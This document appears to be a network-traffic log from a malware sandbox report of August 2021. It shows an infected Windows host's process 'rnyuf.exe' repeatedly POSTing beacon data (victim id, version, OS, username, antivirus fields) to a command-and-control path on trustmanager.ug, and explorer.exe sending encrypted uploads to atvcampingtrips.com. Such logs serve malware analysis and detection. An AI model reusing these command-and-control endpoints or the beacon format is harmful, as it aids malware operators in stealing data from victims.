Aug 23, 2021 02:09:02.979852915 CEST	16154	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:02.980379105 CEST	16155	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:02.980750084 CEST	16157	OUT	Data Raw: a4 b6 e1 64 95 9c 02 cd 9c 13 9f 4a f3 7f 8f 70 b5 bd 8f 84 e0 72 0b 47 1c e8 48 e9 90 21 15 e2 d4 56 94 f0 dc 92 e6 b9 5c f1 49 d9 6e 25 2d 25 2d 75 19 0b 45 25 2e 68 00 a2 8a 3b 53 00 34 50 69 29 00 bd e8 34 51 8a 00 05 3a 92 96 98 80 51 45 14 Data Ascii: dJprGH!V\In%-%-uE%.h;S4Pi)4Q:QEw;L`4KEvFRKF)XjD;M{Q4TWb-?4X.QKj0ij=%--BbSF)((KE-RvQ@sG4BQEE-RhQ`
Aug 23, 2021 02:09:02.980829954 CEST	16158	OUT	Data Raw: f6 68 39 ce d5 6f 94 fd 47 43 54 32 31 d4 50 08 f5 aa 6d 3d c5 aa 3d 07 4e f8 b5 ac db 44 62 bd 82 2b b5 c6 32 1b 61 fc 78 23 f2 02 b2 75 4f 1f eb 3a 81 65 89 96 da 33 d9 39 3f 99 ff 00 0a e7 74 eb 29 35 4d 52 cf 4f 81 e3 59 ae a7 48 23 2e 70 a1 Data Ascii: h9oGCT21Pm==NDb+2ax#uO:e39?t)5MROYH#.p3sU_*i"b7#8<dV\|yI52's55x^m^5+f6vw(v3FX4GF\|j4D6@<97<@iM^jJme)7msji[h{f
Aug 23, 2021 02:09:02.981383085 CEST	16160	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:04.345386982 CEST	16257	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.3	49793	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:03.085932970 CEST	16172	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:03.111670017 CEST	16187	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:03.111690998 CEST	16187	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.3	49794	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:03.260920048 CEST	16201	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:03.286813974 CEST	16214	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:03.286834002 CEST	16214	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.3	49795	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:03.427843094 CEST	16234	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:03.453547955 CEST	16235	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:03.453568935 CEST	16236	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49726	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:07.956429005 CEST	2809	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: atvcampingtrips.com
Aug 23, 2021 02:08:07.956486940 CEST	2809	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 37 5e ff f8 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vu7^iYvXP+$sgW@%e+F[w\M+nHI ]x#
